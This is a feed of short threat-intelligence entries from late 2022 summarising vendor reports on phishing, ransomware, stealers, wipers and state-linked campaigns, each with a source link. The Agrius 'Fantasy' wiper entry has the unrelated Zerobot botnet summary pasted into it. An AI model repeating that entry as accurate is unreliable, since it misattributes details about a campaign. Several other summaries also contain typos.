Date of Scan:: 2022-12-08

Impact:: LOW

Summary:: ASEC analysis team has recently detected the distribution of a phishing email impersonating a non-profit quasi-governmental organization. Since the email is using a webpage disguised as a login page of GobizKOREA serviced by Korea SMEs and Startups Agency (KOSME), users who are working in the trading industry should take extra caution.

Source: https://asec.ahnlab.com/en/43596/

Intel Source:: Securelist

Intel Name:: DeathStalker_targets_legal_entities_with_new_Janicab_variant

Date of Scan:: 2022-12-08

Impact:: LOW

Summary:: Securelist's reserachers Deathstalker intrusions that use the Janicab malware family, we identified a new Janicab variant used in targeting legal entities in the Middle East throughout 2020, possibly active during 2021 and potentially extending an extensive campaign that has been traced back to early 2015 and targeted legal, financial, and travel agencies in the Middle East and Europe.

Source: https://securelist.com/deathstalker-targets-legal-entities-with-new-janicab-variant/108131/

Intel Source:: Threat Fabric

Intel Name:: New_obfuscation_service_used_by_Ermac_when_distributed_together_with_desktop_stealers

Date of Scan:: 2022-12-08

Impact:: LOW

Summary:: ThreatFabric’s analysts discovered a campaign employing several Trojans, and targeting both Android and Windows users at the same time, in order to reach as much victims as possible. Besides Ermac Android banking Trojan, the campaign involved desktop malware in the form of Erbium, Aurora stealer, and Laplas “clipper”.

Source: https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html

Intel Source:: Picus Security

Intel Name:: Cuba_Ransomware_TTPs

Date of Scan:: 2022-12-08

Impact:: MEDIUM

Summary:: Security researchers from Picus Security have track downed a new variant of the Cuba ransomware as Tropical Scorpius. This Cuba ransomware group mainly targets manufacturing, professional and legal services, financial services, construction, high technology, and healthcare sectors

Source: https://www.picussecurity.com/resource/blog/cisa-alert-aa22-335a-cuba-ransomware-analysis-simulation-ttps-iocs

Intel Source:: ASEC

Intel Name:: Resumexll_File_Being_Distributed_in_Korea

Date of Scan:: 2022-12-07

Impact:: LOW

Summary:: ASEC analysis team shared that malware with the XLL file format (file extension: .xll) was being distributed via email. The XLL file has a DLL form of a PE (Portable Executable) file but is executed with Microsoft Excel.

Source: https://asec.ahnlab.com/en/43332/

Intel Source:: Microsoft

Intel Name:: Targeted_attacks_by_DEV_0139_against_the_cryptocurrency_industry

Date of Scan:: 2022-12-07

Impact:: LOW

Summary:: Microsoft shared that cryptocurrency companies have been targeted by a threat group DEV-0139 via Telegram groups used to communicate with the firms' VIP customers.

Source: https://www.microsoft.com/en-us/security/blog/2022/12/06/dev-0139-launches-targeted-attacks-against-the-cryptocurrency-industry/

Intel Source:: WeliveSecurity

Intel Name:: A_new_Agrius_threat_group_wiper_Fantasy

Date of Scan:: 2022-12-07

Impact:: MEDIUM

Summary:: Agrius is a new Iranian group targeting victims in Israel and the United Arab Emirates since 2020. The group initially deployed a wiper. Recently group deployed a new wiper named Fantasy. Most of its code base comes from Apostle, Agrius’s previous wiper. Recently FortiGuard Labsteam observed a new botnet written in the Go language being distributed through IoT vulnerabilities and categorized it as critical. This botnet, known as Zerobot, contains several modules, including self-replication, attacks for different protocols, and self-propagation. It also communicates with its command-and-control server using the WebSocket protocol. The reserachers detailed in the article how this malware leverages vulnerabilities and examines its behavior once inside an infected device.

Source: https://www.welivesecurity.com/2022/12/07/fantasy-new-agrius-wiper-supply-chain-attack/

Intel Source:: ASEC

Intel Name:: Phishing_Email_Disguised_as_a_WellKnown_Korean_Airline

Date of Scan:: 2022-12-07

Impact:: LOW

Summary:: ASEC analysis team has recently discovered a phishing email that impersonates a well-known Korean airline to collect user credentials. The phishing email contains a notice on airline ticket payment, inducing the reader to connect to the disguised phishing page with specific ticket prices and details that implies that the sender has background information of the reader.

Source: https://asec.ahnlab.com/en/43510/

Intel Source:: Fortinet

Intel Name:: Zerobot_New_Go_Based_Botnet

Date of Scan:: 2022-12-07

Impact:: MEDIUM

Summary:: Recently FortiGuard Labsteam observed a new botnet written in the Go language being distributed through IoT vulnerabilities and categorized it as critical. This botnet, known as Zerobot, contains several modules, including self-replication, attacks for different protocols, and self-propagation. It also communicates with its command-and-control server using the WebSocket protocol. The reserachers detailed in the article how this malware leverages vulnerabilities and examines its behavior once inside an infected device.

Source: https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities

Intel Source:: ASEC

Intel Name:: Malware_Distributed_with_Disguised_Filenames

Date of Scan:: 2022-12-07

Impact:: LOW

Summary:: ASEC analysis team made a post on the malware being distributed with filenames that utilize RTLO (Right-To-Left Override). RTLO is a unicode that makes an override from right to left. This type of malware induces users to execute its files by mixing filenames with extensions

Source: https://asec.ahnlab.com/en/43518/

Intel Source:: CrowdStrike

Intel Name:: CrowdStrike_Investigations_Reveal_Intrusion_Campaign_Targeting_Telco_and_BPO_Companies

Date of Scan:: 2022-12-07

Impact:: LOW

Summary:: CrowdStrike Services reviews a recent, extremely persistent intrusion campaign targeting telecommunications and business process outsourcing (BPO) companies and outlines how organizations can defend and secure their environments.

Source: https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/

Intel Source:: Bitdefender

Intel Name:: A_New_BackdoorDiplomacy_Threat_Actor_Campaign_Investigation

Date of Scan:: 2022-12-07

Impact:: LOW

Summary:: Bitdefender researchers did some discoveres for a malicious campaign involving the abuse of binaries vulnerable to sideloading, targeting the Middle East. The reserachers analyzed the evidence for the traces linked to a cyber-espionage operation performed most likely by Chinese threat actor BackdoorDiplomacy against victims that they have linked to activity in the telecom industry in the Middle East.

Source: https://www.bitdefender.com/files/News/CaseStudies/study/426/Bitdefender-PR-Whitepaper-BackdoorDiplomacy-creat6507-en-EN.pdf

Intel Source:: Fortinet

Intel Name:: Ransomware_Turning_into_an_Accidental_Wiper

Date of Scan:: 2022-12-06

Impact:: MEDIUM

Summary:: Researchers from FortiGate have observed Cryptonite sample in the wild that never offers the decryption window, instead acting as a wiper. We recently saw an increase in ransomware intentionally turned into wiper malware, primarily as part of a political campaign.

Source: https://www.fortinet.com/blog/threat-research/The-story-of-a-ransomware-turning-into-an-accidental-wiper

Intel Source:: Security Affairs

Intel Name:: Lazarus_APT_uses_fake_cryptocurrency_apps_to_spread_AppleJeus_Malware

Date of Scan:: 2022-12-05

Impact:: LOW

Summary:: The North Korea-linked Lazarus APT spreads fake cryptocurrency apps under the fake brand BloxHolder to install the AppleJeus malware.

Source: https://securityaffairs.co/wordpress/139290/apt/lazarus-apt-bloxholder-campaign.html

Intel Source:: Cybereason

Intel Name:: Masquerading_as_a_Software_Installer

Date of Scan:: 2022-12-05

Impact:: LOW

Summary:: Cybereason GSOC team analyzes a technique that utilizes Microsoft’s Windows Installation file (.msi) to compromise victims’ machines. MSI, formerly known as Microsoft Installer, is a Windows installer package format.

Source: https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer

Intel Source:: Reversing Labs

Intel Name:: A_deep_dive_into_ZetaNile

Date of Scan:: 2022-12-02

Impact:: LOW

Summary:: ZetaNile is a set of open-source software trojans being used by Lazarus/ZINC. This set of trojanized, open-source software implants has been dubbed ZetaNile by Microsoft and BLINDINCAN by CISA. After some investigation, this campaign presented an opportunity for deep study by the ReversingLabs Research Team.

Source: https://blog.reversinglabs.com/blog/zetanile-open-source-software-trojans-from-north-korea

Intel Source:: Mandiant

Intel Name:: The_cyber_espionage_activity_with_USB_devices

Date of Scan:: 2022-12-02

Impact:: MEDIUM

Summary:: Mandiant Managed Defense team recently identified cyber espionage activity that heavily leverages USB devices as an initial infection vector and concentrates on the Philippines and tracked this activity as UNC4191 and pissible linked to a China nexus.

Source: https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia

Intel Source:: Elastic

Intel Name:: The_delivery_of_YIPPHB_dropper

Date of Scan:: 2022-12-02

Impact:: LOW

Summary:: Elastic Security Labs identified 12 clusters of activity using a similar TTP of threading Base64 encoded strings with Unicode icons to load the YIPPHB dropper. YIPPHB is an unsophisticated, but effective, dropper used to deliver RAT implants going back at least May of 2022.

Source: https://www.elastic.co/es/security-labs/doing-time-with-the-yipphb-dropper

Intel Source:: Trustwave

Intel Name:: Phishing_and_Scams_to_Be_Aware_of_this_Season

Date of Scan:: 2022-12-02

Impact:: LOW

Summary:: Trustwave team has warned to be one the lookout this holiday shopping season for phishing and scams specifically designed to blend in with holiday online shopping activities. Trustwave SpiderLabs has compiled a list of the most prevalent shopping-related scams expected this year. These samples were recently observed from Trustwave’s spam traps and other Trustwave monitoring systems.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tis-the-season-for-online-shopping-and-phishing-scams/

Intel Source:: Weixin

Intel Name:: Mizuho_Bank_of_Japan_as_bait_for_Lazarus_attack

Date of Scan:: 2022-12-02

Impact:: LOW

Summary:: Recently, the Red Raindrop team of QiAnXin Threat Intelligence Center found the latest 0 - kill soft-check attack sample of Lazarus organization in daily threat hunting. Information is used as bait to attack.

Source: https://mp.weixin.qq.com/s/nnLqUBPX8xZ3hCr5u-iSjQ

Intel Source:: Cyfirma

Intel Name:: The_analyses_of_Erbium_Stealer_Malware

Date of Scan:: 2022-12-02

Impact:: MEDIUM

Summary:: CYFIRMA research team observed and analyzed the malware sample. The team has also observed the stealer malware being advertised on Russian-speaking hacker forums. The malware sample is a 32-bit executable binary. It contains obfuscated contents to evade detection by security products and firewalls.

Source: https://www.cyfirma.com/outofband/erbium-stealer-malware-report/

Intel Source:: CISA

Intel Name:: A_released_joint_Cybersecurity_Advisory_for_Cuba_Ransomware

Date of Scan:: 2022-12-02

Impact:: MEDIUM

Summary:: The FBI and CISA released a joint Cybersecurity Advisory (CSA) to provide network defenders tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with Cuba ransomware

Source: https://www.cisa.gov/uscert/ncas/current-activity/2022/12/01/stopransomware-cuba-ransomware

Intel Source:: Securelist

Intel Name:: New_CryWiper_Trojan

Date of Scan:: 2022-12-02

Impact:: MEDIUM

Summary:: Russian reserachers from Securelist caught some attempts by a previously unknown Trojan, which was named CryWiper, to attack the organization's network in the Russian Federation. After studying a sample of malware, they found out that this Trojan, although it disguises itself as a ransomware and extorts money from the victim for "decrypting" data, in fact does not encrypt, but purposefully destroys data in the affected system. Moreover, the analysis of the Trojan's program code showed that this was not the developer's mistake, but his original intention.

Source: https://securelist.ru/novyj-troyanec-crywiper/106114/

Intel Source:: Cyble

Intel Name:: The_distribution_of_Redline_Stealer

Date of Scan:: 2022-12-01

Impact:: LOW

Summary:: Recently Cyble rsearchers identified 6 phishing sites impersonating Express VPN that was distributing Windows malware. The threat actorstried to use phishing emails, online ads, SEO attacks, and various other means to propagate links over the internet.

Source: https://blog.cyble.com/2022/11/30/redline-stealer-being-distributed-via-fake-express-vpn-sites/

Intel Source:: Cyber Florida

Intel Name:: Arechclient2_remote_access_trojan

Date of Scan:: 2022-12-01

Impact:: LOW

Summary:: Cyber Florida has observed network payload data obfuscated via Base64 encoding and sent to what appears to be a command control server. The command and control server appears to be utilizing Google cloud services

Source: https://cyberflorida.org/2022/11/arechclient2/

Intel Source:: Cyble

Intel Name:: New_Malware_Strain_DuckLogs

Date of Scan:: 2022-12-01

Impact:: LOW

Summary:: Recently, Cyble researchers bserved a new malware strain named DuckLogs, which performs multiple malicious activities such as Stealer, Keylogger, Clipper, Remote access, etc. DuckLogs is MaaS (Malware-as-a-Service). It steals users’ sensitive information, such as passwords, cookies, login data, histories, crypto wallet details, etc., and exfiltrates the stolen data from the victim’s machine to its C&C server.

Source: https://blog.cyble.com/2022/12/01/ducklogs-new-malware-strain-spotted-in-the-wild/

Intel Source:: WeliveSecurity

Intel Name:: A_technical_analysis_of_the_Dolphin_backdoor

Date of Scan:: 2022-11-30

Impact:: LOW

Summary:: ESET researchers have analyzed a previously unreported backdoor used by the ScarCruft APT group. The backdoor, which was named Dolphin, has a wide range of spying capabilities, including monitoring drives and portable devices and exfiltrating files of interest, keylogging and taking screenshots, and stealing credentials from browsers.

Source: https://www.welivesecurity.com/2022/11/30/whos-swimming-south-korean-waters-meet-scarcrufts-dolphin/

Intel Source:: Nozomi Networks

Intel Name:: IoT_Botnets_Evade_Detection_and_Analysis_Part_2

Date of Scan:: 2022-11-30

Impact:: LOW

Summary:: Nozomi reserachers team analyzed the malware samples and discovered new modification techniques malware authors are using to evade detection. They are also adopting new methods for crafting malicious files, exploiting a variety of vulnerabilities in IoT devices, and using command-and-control (C&C) servers to maintain control of compromised devices.

Source: https://www.nozominetworks.com/blog/how-iot-botnets-evade-detection-and-analysis-part-2/

Intel Source:: ASEC

Intel Name:: Domains_Used_for_Magniber_Distribution_in_Korea

Date of Scan:: 2022-11-30

Impact:: LOW

Summary:: The ASEC analysis team introduced through a blog post the Magniber ransomware which attempted MOTW (Mark of the Web) bypassing. Afterward, using the data left in Zone.Identifier, we conducted an investigation on the sources used for the distribution of Magniber.

Source: https://asec.ahnlab.com/en/43008/

Intel Source:: Cyble

Intel Name:: The_ransomware_impact_on_Aviation_Industry

Date of Scan:: 2022-11-30

Impact:: LOW

Summary:: This month the ‘Daixin Team’ ransomware group claimed to infiltrate the networks of a Malaysia-based airline. The group allegedly stole 5 million passengers’ data, and airline employees’ personal and corporate information. ‘Daixin Team’ ransomware group came into existence in June 2022 and has claimed responsibility for targeting 5 organizations so far. In the US, the group has primarily affected Healthcare organizations.

Source: https://blog.cyble.com/2022/11/23/aviation-industry-facing-ransomware-headwinds/

Intel Source:: ASEC

Intel Name:: Phishing_Website_Disguised_as_a_Famous_Korean_Email_Login_Website_Being_Distributed

Date of Scan:: 2022-11-30

Impact:: LOW

Summary:: The ASEC analysis team has identified the distribution of a malicious website in Korea that aims to steal account credentials from a famous Korean email service website.

Source: https://asec.ahnlab.com/en/42999/

Intel Source:: Sophos

Intel Name:: Improved_LockBit_3_0_Black_attacks_with_more_capabilities

Date of Scan:: 2022-11-30

Impact:: MEDIUM

Summary:: A Sophos team did some analysis of multiple incidents where attackers used the latest version of LockBit ransomware (known variously as LockBit 3.0 or ‘LockBit Black’) and they discovered the latest tooling used by threat actors. The threat actors have begun experimenting with the use of scripting that would allow the malware to “self-spread” using Windows Group Policy Objects (GPO) or the tool PSExec, potentially making it easier for the malware to laterally move and infect computers without the need for affiliates to know how to take advantage of these features for themselves.

Source: https://news.sophos.com/en-us/2022/11/30/lockbit-3-0-black-attacks-and-leaks-reveal-wormable-capabilities-and-tooling/

Intel Source:: ASEC

Intel Name:: Word_Document_Attack_Distributed_as_Normal_MS_Office_URLs

Date of Scan:: 2022-11-29

Impact:: LOW

Summary:: The ASEC analysis team has discovered during our additional monitoring process that the URL used in the fake Word document is becoming very cleverly disguised to closely resemble the normal URL, and we wish to advise caution on the part of users.

Source: https://asec.ahnlab.com/en/42554/

Intel Source:: DFIR Report

Intel Name:: LNK_File_Leads_to_Domain_Wide_Ransomware

Date of Scan:: 2022-11-29

Impact:: MEDIUM

Summary:: Researchers from DFIR report have identified threat actor gaining access to an environment via Emotet and operating over a eight day period. During this time period, multiple rounds of enumeration and lateral movement occurred using Cobalt Strike. Remote access tools were used for command and control, such as Tactical RMM and Anydesk.

Source: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/

Intel Source:: Malwarebytes

Intel Name:: Massive_malvertising_campaign_capitalize_on_Black_Friday

Date of Scan:: 2022-11-29

Impact:: MEDIUM

Summary:: Researchers from Malwarebytes have identified an ongoing malvertising campaign has been ramping up a fraudulent campaign via Google ads for the popular Walmart brand. Perhaps due to the upcoming Black Friday shopping deals, we are seeing a dramatic increase in traffic towards a number of malicious sites registered for the purpose of serving tech support scams.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2022/11/scammers-capitalize-on-black-friday-week-with-massive-malvertising-campaign

Intel Source:: Cyble

Intel Name:: New_Variant_Of_Ransomware_Targeting_Chile

Date of Scan:: 2022-11-29

Impact:: MEDIUM

Summary:: Researchers from Cyble have identified a new variant of Punisher ransomware that was spreading through a COVID-19 theme-based phishing website. This Ransomware strain uses a common ransom note which is downloaded from the remote server, and then appends content to the ransom note to make it specific to each of its victims. The figure below shows the HTML file used as a ransom note.

Source: https://blog.cyble.com/2022/11/25/punisher-ransomware-spreading-through-fake-covid-site/

Intel Source:: ASEC

Intel Name:: Word_Document_Attack_Distributed_in_Disguise_of_a_News_Survey

Date of Scan:: 2022-11-29

Impact:: LOW

Summary:: The ASEC analysis team discovered that the Word document type identified in the blog, ‘Malicious Word Files Targeting Specific Individuals Related to North Korea,’ has recently been using FTP to leak user credentials. The filename of the identified Word document is ‘CNA[Q].doc’, disguised as a CNA Singaporean TV program interview.

Source: https://asec.ahnlab.com/en/42529/

Intel Source:: CYJAX

Intel Name:: China_Based_Fangxiao_Group_Running_Long_Phishing_Campaign

Date of Scan:: 2022-11-29

Impact:: MEDIUM

Summary:: Researchers from CYJAX have observed that a China-based financially motivated group, dubbed Fangxiao, orchestrated a large-scale phishing campaign since 2017. The phishing campaign exploits the reputation of international brands and targets businesses in multiple industries, including retail, banking, travel, and energy. Attackers imitated over 400 organisations, including Emirates, Singapore’s Shopee, Unilever, Indonesia’s Indomie, Coca-Cola, McDonald’s, and Knorr.

Source: https://www.cyjax.com/2022/11/14/fangxiao-a-chinese-threat-actor/

Intel Source:: Sucuri

Intel Name:: New_Wave_of_SocGholish_Malware

Date of Scan:: 2022-11-28

Impact:: LOW

Summary:: Researchers from Sucuri have observed a new type of WordPress infection where threat actors used a distinguished feature to inject SocGholish malware.

Source: https://blog.sucuri.net/2022/11/new-wave-of-socgholish-cid27x-injections.html

Intel Source:: ESET Research

Intel Name:: The_New_Wave_of_RansomBoggs_Ransomware

Date of Scan:: 2022-11-28

Impact:: LOW

Summary:: Researchers from ESET have identified new ransomware attacks targeting organizations in Ukraine that have been linked to the notorious Russian military threat group Sandworm.

Source: https://twitter.com/ESETresearch/status/1596181925663760386

Intel Source:: ASEC

Intel Name:: LockBit_Ransomware_Being_distributed_With_Similar_Filenames

Date of Scan:: 2022-11-28

Impact:: LOW

Summary:: Researchers from ASEC have observed LockBit 2.0 and LockBit 3.0 are being distributed again with only a change to their filenames.

Source: https://asec.ahnlab.com/en/42890/

Intel Source:: Cloudsek

Intel Name:: Diving_Deep_into_Eternity_Stealer

Date of Scan:: 2022-11-28

Impact:: LOW

Summary:: Researchers from CloudSEK have deeply analyzed the workings of Eternity stealer and provided a basic explanation of its techniques and methods.

Source: https://cloudsek.com/technical-analysis-of-the-eternity-stealer/?utm_source=rss&utm_medium=rss&utm_campaign=technical-analysis-of-the-eternity-stealer

Intel Source:: ASEC

Intel Name:: Wiki_Ransomware_Distributing_in_Korea

Date of Scan:: 2022-11-25

Impact:: LOW

Summary:: ASEC researchers have identified the distribution of Wiki ransomware, which has been determined to be a variant of Crysis ransomware, is disguised as a normal program.

Source: https://asec.ahnlab.com/en/42507/

Intel Source:: Fortinet

Intel Name:: Hackers_Targeting_Online_Shoppers_on_Black_Friday

Date of Scan:: 2022-11-25

Impact:: MEDIUM

Summary:: Researchers from FortiGate have observed two Black Friday-oriented cyber-attacks that are gaining traction, one using an old PDF file and another exploiting typosquatting.

Source: https://www.fortinet.com/blog/threat-research/Beware-of-Cybercriminals-Preying-on-Online-Shoppers-on-Black-Friday?&web_view=true

Intel Source:: ASEC

Intel Name:: Koxic_Ransomware_Distributing_in_Korea

Date of Scan:: 2022-11-25

Impact:: LOW

Summary:: Researchers from ASEC have discovered that Koxic ransomware is being distributed in Korea. Recently, they found that a file with a modified appearance and internal ransom note had been detected.

Source: https://asec.ahnlab.com/en/42343/

Intel Source:: TrendMicro

Intel Name:: WannaRen_Ransomware_Targeting_Indian_Organization

Date of Scan:: 2022-11-24

Impact:: LOW

Summary:: Trendmicro researchers have observed the new variant of WannaRen ransomware named Life ransomware and this new variant uses a batch file to download and execute WINWORD.exe to perform DLL side-loading and load the ransomware in memory.

Source: https://www.trendmicro.com/en_us/research/22/k/wannaren-returns-as-life-ransomware--targets-india.html

Intel Source:: Fortinet

Intel Name:: The_Examination_of_Cryptonite_Ransomware

Date of Scan:: 2022-11-24

Impact:: LOW

Summary:: Researchers from Fortinet have analyzed the Cryptonite ransomware kit that exists as free and open-source software.

Source: https://www.fortinet.com/blog/threat-research/Ransomware-Roundup-Cryptonite-Ransomware?&web_view=true

Intel Source:: Cofense

Intel Name:: Phishing_Attack_Targeting_Microsoft_Users

Date of Scan:: 2022-11-24

Impact:: LOW

Summary:: Researchers from Cofense have analyzed a phishing campaign that is targeted to steal an employee’s Microsoft credentials via a malicious HTML attachment. The attached file includes spliced code when it’s executed it scrapes for the employee’s credentials.

Source: https://cofense.com/blog/phishing-attack-targets-microsoft-users-via-html-attachment

Intel Source:: Zscaler

Intel Name:: Fake_FIFA_World_Cup_Streaming_Sites_Targeting_Virtual_Fans

Date of Scan:: 2022-11-23

Impact:: HIGH

Summary:: Researchers from Zscaler have identified the FIFA World Cup 2022 has brought with it a spike in cyber attacks targeting football fans through fake streaming sites and lottery scams, leveraging the rush and excitement around these uncommon events to infect users with malware.

Source: https://www.zscaler.com/blogs/security-research/surge-fake-fifa-world-cup-streaming-sites-targets-virtual-fans

Intel Source:: Cybereason

Intel Name:: Black_Basta_Ransomware_Usin_Qakbot_Malware_to_Target_US_Companies

Date of Scan:: 2022-11-23

Impact:: LOW

Summary:: Researchers from Cybereason have identified the Black Basta ransomware gang is using QakBot malware to create an initial point of entry and move laterally within an organization’s network.

Source: https://www.cybereason.com/blog/threat-alert-aggressive-qakbot-campaign-and-the-black-basta-ransomware-group-targeting-u.s.-companies

Intel Source:: IBM Security Intelligence

Intel Name:: New_Variant_of_RansomExx_Ransomware

Date of Scan:: 2022-11-23

Impact:: LOW

Summary:: IBM security intelligence researchers have discovered a new variant of the RansomExx ransomware that has been rewritten in the Rust programming language. Malware written in Rust often benefits from lower AV detection rates and this may have been the primary reason to use of the language.

Source: https://securityintelligence.com/posts/ransomexx-upgrades-rust/

Intel Source:: Checkpoint

Intel Name:: Fake_Shopping_Websites_Running_For_Black_Friday_Sales

Date of Scan:: 2022-11-23

Impact:: MEDIUM

Summary:: Checkpoint researchers have found a sharp increase in fake shopping-related websites in the run-up to Black Friday sales. Also, warns shoppers to stay alert this Black Friday as hackers launch their own holiday specials.

Source: https://blog.checkpoint.com/2022/11/17/check-point-research-warns-shoppers-to-stay-alert-this-black-friday-as-hackers-launch-their-own-holiday-specials/

Intel Source:: Microsoft

Intel Name:: Hackers_Exploiting_Unused_Boa_Web_Servers

Date of Scan:: 2022-11-23

Impact:: MEDIUM

Summary:: Microsoft researchers have observed that the intrusion activity aimed at Indian power grid entities earlier this year probably exploited security flaws in the now-discontinued web server Boa.

Source: https://www.microsoft.com/en-us/security/blog/2022/11/22/vulnerable-sdk-components-lead-to-supply-chain-risks-in-iot-and-ot-environments/

Intel Source:: Securonix

Intel Name:: QakBot_Malware_New_Initial_Execution

Date of Scan:: 2022-11-22

Impact:: MEDIUM

Summary:: Reseacherers from Securonix shared their observation of recent version of the QakBot, aka Qbot, malware where calls to the Windows binary Regsvr32 are obfuscated in creative ways.

Source: https://www.securonix.com/blog/qbot-qakbot-malwares-new-initial-execution/

Intel Source:: Avast

Intel Name:: Hackers_Leveraging_Chrome_Extension_to_Steal_Cryptocurrency_and_Passwords

Date of Scan:: 2022-11-22

Impact:: LOW

Summary:: Researchers from Avast have identified an information-stealing Google Chrome browser extension named 'VenomSoftX' which is being deployed by Windows malware to steal cryptocurrency and clipboard contents as users browse the web.

Source: https://decoded.avast.io/janrubin/vipersoftx-hiding-in-system-logs-and-spreading-venomsoftx/

Intel Source:: Sekoia

Intel Name:: Rapidly_Increasing_Aurora_InfoStealer_Malware

Date of Scan:: 2022-11-22

Impact:: LOW

Summary:: Researchers from Sekoia have identified cybergangs are increasingly turning to a new Go-based information stealer named ‘Aurora’ to steal sensitive information from browsers and cryptocurrency apps, exfiltrate data directly from disks, and load additional payloads.

Source: https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar/

Intel Source:: Rewterz

Intel Name:: Active_IoCs_of_Donot_APT_group

Date of Scan:: 2022-11-22

Impact:: LOW

Summary:: Researchers from Rewterz Identified various attack campaigns from Donot APT group targetting Pakistan and other Asian countries. The most recent campaign leverages RTF documents spread through Phishing.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-donot-apt-group-active-iocs-44

Intel Source:: PaloAlto

Intel Name:: DoubleZero_Wiper

Date of Scan:: 2022-11-22

Impact:: LOW

Summary:: Researchers from PaloAlto have introduce a machine learning model that predicts the maliciousness of .NET samples based on specific structures in the file, by analyzing a .NET wiper named DoubleZero.

Source: https://unit42.paloaltonetworks.com/doublezero-net-wiper/

Intel Source:: Netskope

Intel Name:: Hackers_Leveraging_Adobe_Acrobat_For_Phishing_Attack

Date of Scan:: 2022-11-22

Impact:: LOW

Summary:: Researchers from Netskope have discovered a phishing campaign that is abusing Adobe Acrobat to host a Microsoft Office phishing page.

Source: https://www.netskope.com/blog/cloud-abuse-new-technique-using-adobe-acrobat-to-host-phishing

Intel Source:: Cyble

Intel Name:: The_browser_hijacking_by_multiple_Chrome_extensions

Date of Scan:: 2022-11-22

Impact:: LOW

Summary:: Cyble Research and Intelligence Labs (CRIL) discovered multiple Chrome extensions that compromised over two million users with Browser Hijackers. All the extensions that they found were present on the Chrome web store. After installation, it was observed that the browsers hijackers were also changing the browser’s default search engine without the users’ knowledge.

Source: https://blog.cyble.com/2022/11/22/over-2-million-users-affected-with-browser-hijackers/

Intel Source:: Zscaler

Intel Name:: Hackers_Are_Active_Again_For_Festival_Season

Date of Scan:: 2022-11-22

Impact:: MEDIUM

Summary:: Researchers from Zscaler have observed four emerging skimming attacks targeting e-commerce stores. These skimming campaigns have a long shelf life and manage to keep their malicious activities under the radar for several months.

Source: https://www.zscaler.com/blogs/security-research/black-friday-scams-4-emerging-skimming-attacks-watch-holiday-season

Intel Source:: ISC.SANS

Intel Name:: Fake_Antivirus_Phishing_Campaign

Date of Scan:: 2022-11-21

Impact:: LOW

Summary:: Researchers from SANS have analyzed the phishing email which looks a like McAfee antivirus subscription.

Source: https://isc.sans.edu/diary/rss/29264

Intel Source:: Cyble

Intel Name:: New_Wave_of_Ransomware_Campaigns

Date of Scan:: 2022-11-21

Impact:: LOW

Summary:: Researchers from Cyble have identified three new ransomware families: AXLocker, Octocrypt, and Alice Ransomware. They are not only encrypting victims files and demanding a ransom payment but also stealing the Discord accounts of infected users.

Source: https://blog.cyble.com/2022/11/18/axlocker-octocrypt-and-alice-leading-a-new-wave-of-ransomware-campaigns/

Intel Source:: Talos

Intel Name:: New_Improved_Versions_of_LodaRAT

Date of Scan:: 2022-11-21

Impact:: LOW

Summary:: Researchers from Cisco Talos have identified several variants and altered versions of LodaRAT with updated functionality and including new functionality allowing proliferation to attached removable storage, a new string encoding algorithm, and the removal of “dead” functions.

Source: https://blog.talosintelligence.com/get-a-loda-this/?&web_view=true

Intel Source:: Trellix

Intel Name:: Hackers_Leveraging_FIFA_World_Cup_For_Phishing_Attack

Date of Scan:: 2022-11-21

Impact:: HIGH

Summary:: Researchers from Trellix have observed attackers leveraging FIFA and football-based campaigns to target organizations in Arab countries.

Source: https://www.trellix.com/en-us/about/newsroom/stories/research/email-cyberattacks-on-arab-countries-rise.html

Intel Source:: Akamai

Intel Name:: Phishing_Attack_Leveraging_Famous_Brands_to_Targeting_US_shoppers

Date of Scan:: 2022-11-18

Impact:: MEDIUM

Summary:: Akamai researchers have identified a sophisticated phishing kit that is targeting North Americans since mid-September, using lures focused on holidays like Labor Day and Halloween.

Source: https://www.akamai.com/blog/security-research/sophisticated-phishing-scam-abusing-holiday-sentiment

Intel Source:: Checkmarx Security

Intel Name:: W4SP_Stealer_Targeting_Python_Developers

Date of Scan:: 2022-11-18

Impact:: LOW

Summary:: Researchers from Checkmarx Security have identified an ongoing supply chain attack that is leveraging malicious Python packages to distribute malware called W4SP Stealer, with over hundreds of victims ensnared to date.

Source: https://medium.com/checkmarx-security/wasp-attack-on-python-polymorphic-malware-shipping-wasp-stealer-infecting-hundreds-of-victims-10e92439d192

Intel Source:: Recorded Future

Intel Name:: The_Analysis_of_2022_FIFA_World_Cup_Threat

Date of Scan:: 2022-11-18

Impact:: MEDIUM

Summary:: Researchers from Recorded Future have analyzed the threat landscape ahead of the 2022 FIFA World Cup hosted in Qatar that begins on November 20, 2022.

Source: https://www.recordedfuture.com/fielding-cyber-influence-and-physical-threats-to-2022-fifa-world-cup-in-qatar

Intel Source:: TrendMicro

Intel Name:: Earth_Preta_Hackers_Targeting_Governments_Worldwide

Date of Scan:: 2022-11-18

Impact:: MEDIUM

Summary:: Researchers from Trendmicro have observed that the Threat group Earth Preta targets worldwide Governments via a Spear-phishing attack. They abused fake Google accounts to distribute the malware via spear-phishing emails, initially stored in an archive file (such as rar/zip/jar) and distributed through Google Drive links.

Source: https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html

Intel Source:: CISA

Intel Name:: Hive_ransomware_extorted_100M_from_over_1300_victims

Date of Scan:: 2022-11-18

Impact:: MEDIUM

Summary:: Researchers from FBI have identified that the notorious Hive ransomware gang has successfully extorted roughly $100 million from over a thousand companies since June 2021. Also, the FBI says that the Hive gang will deploy additional ransomware payloads on the networks of victims who refuse to pay the ransom.

Source: https://www.cisa.gov/uscert/ncas/alerts/aa22-321a

Intel Source:: Krebon Security

Intel Name:: The_Disneyland_Malware_Team_activity

Date of Scan:: 2022-11-17

Impact:: LOW

Summary:: A cybercrime group calling itself the Disneyland Team has been operating dozens of phishing domains that spoof popular bank brands since March 2022. the Disneyland Team has been making liberal use of visually confusing phishing domains that spoof popular bank brands using Punycode, an Internet standard that allows web browsers to render domain names with non-Latin alphabets like Cyrillic.

